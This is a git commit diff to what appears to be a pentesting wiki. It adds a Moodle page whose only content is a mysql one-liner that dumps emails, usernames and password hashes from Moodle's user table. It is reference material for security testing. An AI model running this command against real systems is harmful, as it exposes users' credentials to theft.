GitBook: [master] 2 pages modified

This commit is contained in:
CPol 2021-04-05 22:03:17 +00:00 committed by gitbook-bot
parent 5208417c1b
commit d399bd17b6
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 11 additions and 0 deletions

View File

@ -184,6 +184,7 @@
* [69/UDP TFTP/Bittorrent-tracker](pentesting/69-udp-tftp.md)
* [79 - Pentesting Finger](pentesting/pentesting-finger.md)
* [80,443 - Pentesting Web Methodology](pentesting/pentesting-web/README.md)
* [Moodle](pentesting/pentesting-web/moodle.md)
* [Golang](pentesting/pentesting-web/golang.md)
* [Uncovering CloudFlare](pentesting/pentesting-web/uncovering-cloudflare.md)
* [Laravel](pentesting/pentesting-web/laravel.md)

View File

@ -0,0 +1,10 @@
# Moodle
## Dump Credentials
```bash
/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
```